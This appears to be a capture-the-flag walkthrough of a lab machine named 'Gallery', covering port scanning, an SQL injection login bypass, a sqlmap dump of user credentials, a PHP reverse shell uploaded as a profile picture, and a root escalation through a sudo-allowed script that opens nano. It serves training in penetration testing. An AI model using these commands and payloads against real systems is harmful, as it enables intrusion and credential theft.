# Gallery
## Nmap
```
nmap 10.10.40.100 -p- -sS -sV
PORT STATE SERVICE VERSION
53/tcp filtered domain
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
```
Starting out on port 80 we have the Apache2 Default Page.
Running `feroxbuster` against the target web server and we see some results.
```
feroxbuster -u http://10.10.40.100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
```
Checking the gallery directory we are redirected to `/gallery/login.php`.
Attempting a login with a simple set of credentials, we check the request in ZAP web proxy and notice a SQL error code has been returned in response to the logon.
Knowing SQL is running on the back end we can try some simple SQL injection on the login page.
Logging in with the SQL injection `' OR 1=1 -- -` for the username and password proves successful.
**Note:** We can also use `sqlmap` with the raw proxy request to enumerate the database and pull the admin hash.
```
sqlmap -r ~/Desktop/request.raw --batch -D gallery_db -T users --columns username,password --dump
```
Back to the logged in page we managed to bypass. We notice we are able to upload a new profile picture to our current administrative user.
As we know PHP is running on the webserver we will ideally upload a PHP reverse shell as the avatar.
**RevShells:**
I opted for the PHP PentestMonkey shell.
After uploading the shell we find it triggers our `netcat` receiver instantly.
**Note:** If for anyone reason this does not trigger we can right click where the avatar is supposed to be in the top right and "Open image in a new tab" to trigger.
Looking through the /var/backups directory we find the directory "mike\_home\_backup".
Within the contents we find that `.bash_history` is readable by us which, contains a potential password.
Using the credentials (altered slightly due to a type in the history file) we are able to `su` over to *mike*.
Where we can then read the `user.txt` flag in Mike's home directory.
Running `sudo -l` we see mike is able to run bash on `/opt/rootkit.sh` as **root** without requiring a password.
Reading the contents of `/opt/rootkit.sh` we see we will be prompted for commands, read looks to be the most promising due to hit executing `nano`.
Looking at GTFOBins we see we are able to escape nano to run system commands.
**GTFOBins:**
**Note:** I was unable to complete the privilege escalation initially as the `nc` shell I was currently using was not stable enough to even work over TTY. `Socat` is installed on the target system and is highly recommended to get a reverse shell with `Socat` as the user mike to complete the next steps.
When ready we execute /opt/rootkit.sh as root.
```
sudo -u root /bin/bash /opt/rootkit.sh
```
Then enter "read" into the interactive prompt where we will move over to a root `nano` session. Pressing `CTRL + R and CTRL + X` on the keyboard will prompt for a command to run in nano.
Entering the command below will escape into a root shell and all us to grab the **root** flag.
```
reset; sh 1>&0 2>&0
```
